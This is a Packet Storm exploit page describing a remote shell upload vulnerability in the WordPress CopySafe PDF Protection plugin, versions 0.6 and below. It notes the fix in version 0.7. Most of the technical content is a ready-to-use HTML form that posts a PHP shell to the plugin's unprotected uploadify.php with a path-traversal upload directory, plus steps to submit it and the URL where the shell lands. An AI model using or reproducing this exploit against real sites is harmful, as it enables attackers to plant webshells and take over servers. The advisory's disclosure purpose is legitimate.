ignore security and it'll go away

WordPress CopySafe PDF Protection 0.6 Shell Upload

WordPress CopySafe PDF Protection 0.6 Shell Upload
Posted Jul 14, 2014
Authored by Jagriti Sahu

WordPress CopySafe PDF Protection plugin versions 0.6 and below suffer from a remote shell upload vulnerability.

tags | exploit, remote, shell
MD5 | 2bb66ce6b558daa1b35ac1b6c6e5058f

WordPress CopySafe PDF Protection 0.6 Shell Upload

Change Mirror Download
##################################################################################################
#Exploit Title : Wordpress Plugin CopySafe PDF Protection Shell Upload
vulnerability
#Author : Jagriti Sahu
#Download Link : http://wordpress.org/support/plugin/wp-copysafe-pdf
#version affected : 0.6 and below
#Date : 14/07/2014
#Discovered at : IndiShell Lab
#Love to : Surbhi, Mradula and Harry
##################################################################################################

////////////////////////
/// Overview:
////////////////////////
Wordpress Plugin CopySafe PDF Protection(upto version 0.6) suffers
from unrestricted file upload vulnerability which allow an attacker to
upload malecious php shell on server.
to avaid exploitation , update plugin to version 0.7

///////////////////////////////
// Vulnerability Description:
///////////////////////////////
vulnerability is due to lib/uploadify/uploadify.php file in which there
is no check during file upload
attacker need to forward file upload request to this file with PHP
shell and file upload path


///////////////////////
/// exploit code ////
///////////////////////


<form
action="http://website.com/wp-content/plugins/wp-copysafe-pdf/lib/uploadify/uploadify.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="wpcsp_file" ><br>
<input type=text name="upload_path" value="../../../../uploads/">
<input type="submit" name="submit" value="Submit">
</form>

save this code on you machine as exploit.html
open exploit.html into webbrowser, brows your php shell and click
submit button

shell will be uploaded in uploads directory
http://website.com/wp-content/uploads/shell.php

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

July 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    2 Files
  • 2
    Jul 2nd
    3 Files
  • 3
    Jul 3rd
    15 Files
  • 4
    Jul 4th
    4 Files
  • 5
    Jul 5th
    15 Files
  • 6
    Jul 6th
    15 Files
  • 7
    Jul 7th
    10 Files
  • 8
    Jul 8th
    2 Files
  • 9
    Jul 9th
    10 Files
  • 10
    Jul 10th
    15 Files
  • 11
    Jul 11th
    15 Files
  • 12
    Jul 12th
    19 Files
  • 13
    Jul 13th
    16 Files
  • 14
    Jul 14th
    15 Files
  • 15
    Jul 15th
    3 Files
  • 16
    Jul 16th
    2 Files
  • 17
    Jul 17th
    8 Files
  • 18
    Jul 18th
    11 Files
  • 19
    Jul 19th
    2 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close